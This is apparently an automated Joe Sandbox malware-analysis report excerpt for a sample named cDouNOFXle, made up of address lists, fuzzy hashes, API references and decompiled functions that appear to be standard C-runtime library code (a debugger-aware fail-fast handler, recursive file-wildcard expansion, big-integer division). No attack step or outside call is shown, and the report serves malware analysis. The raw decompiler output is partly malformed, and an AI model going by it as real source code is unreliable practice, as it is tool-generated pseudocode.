0x00063275
0x00063280
0x00063280
0x0006290a
0x000628a6
0x000628a8
0x00000000
0x000628a8
0x0006282c
0x0006282e
0x00062830
0x00062836
0x00000000
0x00062842
0x00062844
0x00062848
0x0006285a
0x00062867
0x00000000
0x00062869
0x00062879
0x0006288a
0x0006288f
0x00000000
0x0006288f
0x00062867

APIs

__EH_prolog.LIBCMT ref: 000627F1
_strlen.LIBCMT ref: 00062D7F

Part of subcall function 0007137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0006B652,00000000,?,?,?,00070354), ref: 00071396

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00062EE0

Strings

CMT, xrefs: 00062F13

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: d0777d620b97ac2a397c2c02ef20a2dae1e58dd366eddbbb0af9356e3e1d1390
Instruction ID: feadd368df258a4bbfbb6ea9d08b587cdbc9788a919daf7172457fc483588222
Opcode Fuzzy Hash: d0777d620b97ac2a397c2c02ef20a2dae1e58dd366eddbbb0af9356e3e1d1390
Instruction Fuzzy Hash: AF62F5715006848FDF29DF74C895AEA3BE2EF54304F04457EEC9A8B283DB75A985CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0008866F Relevance: 4.6, APIs: 3, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E0008866F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x9e668; // 0x136d1c5
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0007F0B1(_t41);
					_pop(_t62);
				}
				E0007F350(_t67,  &_v804, 0, 0x50);
				E0007F350(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E0007F0B1(_t57);
				}
				return E0007EC4A(_v8 ^ _t70);
			}

0x0008866f
0x0008866f
0x0008866f
0x0008866f
0x0008867a
0x0008867f
0x00088681
0x00088689
0x0008868b
0x0008868e
0x00088693
0x00088693
0x0008869f
0x000886b2
0x000886c0
0x000886c6
0x000886cc
0x000886d2
0x000886d8
0x000886de
0x000886e4
0x000886ea
0x000886f0
0x000886f6
0x000886fd
0x00088704
0x0008870b
0x00088712
0x00088719
0x00088720
0x00088721
0x0008872a
0x00088730
0x00088733
0x00088739
0x00088746
0x0008874f
0x00088758
0x00088761
0x0008876f
0x00088771
0x00088786
0x00088792
0x00088795
0x0008879a
0x000887a9

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00088767
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00088771
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0008877E

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 8b845b2c799e3ddf66cbffe93025f2af450fb6e2a69887184c4a06295952cc0d
Instruction ID: 35ff57e1c7620a63a941c16ea2829ef362074ae4e0eb8131b68c1b5483809801
Opcode Fuzzy Hash: 8b845b2c799e3ddf66cbffe93025f2af450fb6e2a69887184c4a06295952cc0d
Instruction Fuzzy Hash: F031B5759012299BCB61DF64DC89BDDBBB8BF08310F5081EAE90CA7251EB349F858F45

Uniqueness

Uniqueness Score: -1.00%

Function 0008AAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0008AAA8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E000885A9(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E0008E8A2(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E0008ACE7(_a16, _t101, __eflags, _t111);
							E000884DE(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E0008E8A2(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00088849();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x9e668; // 0x136d1c5
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E0008E8F0(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E0007F350(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E0008AAA8(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E00085A90(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E0008A900);
									}
								} else {
									_push(_t55);
									_t57 = E0008AAA8(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E0008AAA8(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E0007EC4A(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}

0x0008aaad
0x0008aaae
0x0008aab1
0x0008aab1
0x0008aab4
0x0008aab4
0x0008aab6
0x0008aab7
0x0008aac0
0x0008aac1
0x0008aac4
0x0008aac7
0x0008aacc
0x0008aad3
0x0008aad4
0x0008aad5
0x0008aad8
0x0008aae2
0x0008aae5
0x0008aae6
0x0008aae8
0x0008aafc
0x0008aafc
0x0008aaff
0x0008ab09
0x0008ab0e
0x0008ab11
0x0008ab13
0x00000000
0x0008ab15
0x0008ab19
0x0008ab22
0x0008ab28
0x00000000
0x0008ab2b
0x0008aaea
0x0008aaea
0x0008aaf0
0x0008aaf5
0x0008aaf8
0x0008aafa
0x0008ab31
0x0008ab33
0x0008ab34
0x0008ab35
0x0008ab36
0x0008ab37
0x0008ab38
0x0008ab3d
0x0008ab41
0x0008ab43
0x0008ab49
0x0008ab50
0x0008ab53
0x0008ab56
0x0008ab57
0x0008ab5a
0x0008ab5b
0x0008ab5e
0x0008ab5f
0x0008ab80
0x0008ab80
0x0008ab82
0x00000000
0x00000000
0x0008ab67
0x0008ab69
0x0008ab6b
0x0008ab6d
0x0008ab6f
0x0008ab71
0x0008ab73
0x0008ab7e
0x00000000
0x0008ab7e
0x0008ab73
0x0008ab6f
0x00000000
0x0008ab6b
0x0008ab84
0x0008ab86
0x0008ab89
0x0008aba2
0x0008aba2
0x0008aba4
0x0008aba7
0x0008abb7
0x0008abb9
0x0008abb9
0x0008aba9
0x0008aba9
0x0008abac
0x00000000
0x0008abae
0x0008abae
0x0008abb1
0x00000000
0x0008abb3
0x0008abb3
0x0008abb3
0x0008abb1
0x0008abac
0x0008abbf
0x0008abc7
0x0008abcb
0x0008abd9
0x0008abde
0x0008abf3
0x0008abf5
0x0008abfb
0x0008abfe
0x0008ac30
0x0008ac30
0x0008ac32
0x0008ac35
0x0008ac3b
0x0008ac3b
0x0008ac42
0x0008ac5c
0x0008ac5c
0x0008ac6b
0x0008ac70
0x0008ac73
0x0008ac75
0x00000000
0x00000000
0x00000000
0x00000000
0x0008ac44
0x0008ac44
0x0008ac4a
0x0008ac4c
0x00000000
0x0008ac4e
0x0008ac4e
0x0008ac51
0x00000000
0x0008ac53
0x0008ac53
0x0008ac5a
0x00000000
0x00000000
0x00000000
0x00000000
0x0008ac5a
0x0008ac51
0x0008ac4c
0x00000000
0x0008ac77
0x0008ac7f
0x0008ac85
0x0008ac87
0x0008ac87
0x0008ac8f
0x0008ac94
0x0008ac9c
0x0008ac9f
0x0008aca1
0x0008acb5
0x0008acba
0x0008ac00
0x0008ac00
0x0008ac04
0x0008ac0c
0x0008ac0c
0x0008ac0c
0x0008ac0e
0x0008ac11
0x0008ac14
0x0008ac14
0x0008ab8b
0x0008ab8e
0x0008ab90
0x00000000
0x0008ab92
0x0008ab92
0x0008ab98
0x0008ab9d
0x0008ab90
0x0008ac21
0x0008ac2c
0x00000000
0x00000000
0x00000000
0x0008aafa
0x0008aace
0x0008aad0
0x0008ab2c
0x0008ab30
0x0008ab30
0x00000000

Strings

., xrefs: 0008AC3B

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: e4a3b8e531e1db972dcdf4eb45e4c019ee39b2093525cc014d8061a972fcfd4a
Instruction ID: 0bc5695216b213c2edf9f692eb1d76c8d9de5b864422b9e8fbd217c2c13d8b6d
Opcode Fuzzy Hash: e4a3b8e531e1db972dcdf4eb45e4c019ee39b2093525cc014d8061a972fcfd4a
Instruction Fuzzy Hash: FA3109719001496FEB24EE78CC84EFB7BBDFB86314F0401A9F55897652D6349D41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0008CB60 Relevance: 3.5, APIs: 2, Instructions: 464
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 90%

			E0008CB60(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E0007E7C0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00091930(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E0007E7E0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E0007E7E0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x8e17d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00091930( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E0008E3AA(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E0008E3AA(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E0008E3AA(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x0008cb6c
0x0008cb6f
0x0008cb73
0x0008cb7d
0x0008cb80
0x0008cb82
0x0008cb84
0x0008cb91
0x0008cb91
0x0008cb94
0x0008cb94
0x0008cb97
0x0008cb9a
0x0008cb9c
0x0008cccf
0x0008ccd1
0x0008cd1a
0x0008cd1e
0x0008cd24
0x0008ccd3
0x0008ccd5
0x0008ccd8
0x0008ccda
0x0008ccdd
0x0008ccdf
0x0008cce1
